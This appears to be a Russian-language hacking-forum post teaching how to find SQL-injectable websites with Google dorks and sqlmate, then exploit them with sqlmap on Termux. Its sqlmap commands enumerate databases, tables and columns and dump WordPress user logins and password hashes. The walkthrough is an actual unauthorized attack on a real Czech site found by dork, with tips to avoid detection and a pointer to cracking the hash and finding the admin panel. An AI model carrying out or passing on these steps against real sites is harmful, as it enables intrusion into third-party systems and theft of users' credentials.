- Регистрация
- 28 Фев 2019
- Сообщения
- 6
- Баллы
- 0
- Общие продажи
- 0$
- Общие покупки
- 0$
В прошлой статье я показал где найти, как установить эмуль и подключить нужную клаву.
Сегодня рассмотрим поиск и эксплуатацию сайта уязвимого на sql injection в termux с последующим dump'ом.
Искать мы будем по гугл доркам с помощью проги sqlmate, ну а все остальное по старинке с помощью sqlmap.
Поехали.
Для начала обновляемся все установленные пакеты до последних версий.
Пишем:
apt update -y && apt upgrade -y
Обновились, теперь ставим обе версии python коммандой:
pkg install python2 && pkg install python
Питон нужен для запуска нашего софта, ибо он на нем же и написан) Да и большинство hack софта написано на питоне, изредка там перл или рубик, ну и иногда пыха еще. Ну, именно под термукс. Так что вот так вот.
Если спросит че то, пишем просто "y" типо как да (yes).
Ну а у меня он уже установлен, так шо идем дальше и ставим sqlmap.
Для тех, кто не знает:
Sqlmap - это инструмент для петеста веб приложений. Проверяет на наличие sql injection линк и помогает через дыру залезть в базу данных, исполнять произвольные запросы к ней, простыми словами. Так же заметил, что и XSS определяет там слегка. Но кроссом не занимался пока).
Для установки пишем:
pkg install git -y
git clone --depth 1 sqlmap-dev
Установили, дальше заходим в папку с прогой:
cd sqlmap-dev
Даем права:
chmod +x sqlmap.py
И запускаем:
python2 sqlmap.py
В итоге вот так выглядит sqlmap.
Список комманд и пояснение к ним можно найти здесь(не реклама) .
Теперь о sqlmate.
Sqlmate это хороший друг sqlmap, ибо вдвоем они работают довольно таки хорошо)
Собстно :
-Ищет сайты по доркам. Комманда --dork Дорка.
-Есть брут хэшей пасов md5, sha1 и sha2. Запускается коммандой --hash Сам хэш.
- Умеет искать админки коммандой --admin. База админок вмещает 482 ссылки, что довольно таки не плохо)
- Дампит дорки в тхт коммандой --dump и цифра. Например --dump 1 это получится 20 дорков. 1 = 20 проще говоря
Идем на гит и ставим sqlmate.
Пишем:
git clone
После того как скачается sqlmate пишем:
cd sqlmate
Даем права:
chmod +x sqlmate
Устанавливаем зависимости для проги:
pip2 install -r requirements.txt
Далее запускаем коммандой
python2 sqlmate
Сразу появился инпут и можно ввести дорку. Я буду искать по category.php?id=
Таак, посмотрим. Sqlmate похоже что то нашел, zbs.
Агась, не обращайте внимание на мой , я просто сейчас в чехии, вот он и ищет в этой зоне сайты чешские) Дальше открываем вторую вкладку
Опять же заходим в папку с sqlmap:
cd sqlmap-dev
Пишем:
python2 sqlmap.py -u --random-agent --threads 10 --dbs
-u это Урл сайта
--dbs // это комманда чтоб показать бд сайта
--threads кол. потоков // многопоточность
--random-agent // это рандомный юзер агент, ибо дефолтный палевный.
И ждем, попутно отвечая на вопросы, которые задает скуль.
Если все отлично, то в итоге вы получите список баз как результат.
Теперь смотрим какие базы есть. Таксс, information_schema нам нах не надо. Это дефолтная база, там обычно ниче интересного нету. Еще есть две базы, это thejob_jil и wordpress471. Начнем с thejob_jil.
Пишем в консоль:
python2 sqlmap.py -u --random-agent --threads 10 -D thejob_jil --tables
Малеха поясню:
-D название базы // указываем название базы, с которой будем тянуть таблицы и колонки
--tables // означает, что мы хотим вытянуть таблицы, какие там есть, их названия с базы
Ооо, заепца, есть wp_users. Там наверное точно есть что то интересное. Ща глчнем
Пишем:
python2 sqlmap.py -u --random-agent --threads 10 -D thejob_jil -T wp_users --columns
Новые ключи:
-T название_таблицы // ну тут понятно
--columns // говорим скулю мол нам надо колонки с этой таблицы вытащить.
Смотрим:
То, что нужно) Табла с логинами, мылами и пассами юзеров. Ну что ж, осталось дампануть и глянуть количество и не пусты ли эти коллрнки, а то и такое бывает если честно)
Для этого пишем:
python2 sqlmap.py -u --random-agent --threads 10 -D thejob_jil -T wp_users -C user_login, user_pass --dump
Поясню:
-C название,название,название //выбираем колонки под дамп
--dump // ну это понятно, команда на дамп)
Нуу, вижу тут чисто акк админа и его пасс в хэше, еще и от алгоритма wp и соленный скорее всего. Даж малеха расстроился, ведь на момент написания статьи я расскручивал и сразу писал статью, как бы на одном дыхании)
Тут уже остается брутить и искать админку на сайте, но это уже другая история т.к сказать.
На этом все.
Спасибо за внимание, надеюсь статья была полезной кому-то.
Да и пишу с мобилы статьи,так что не знаю как видон с компа у них. Если что - скажите, я отредактирую. Благодарю.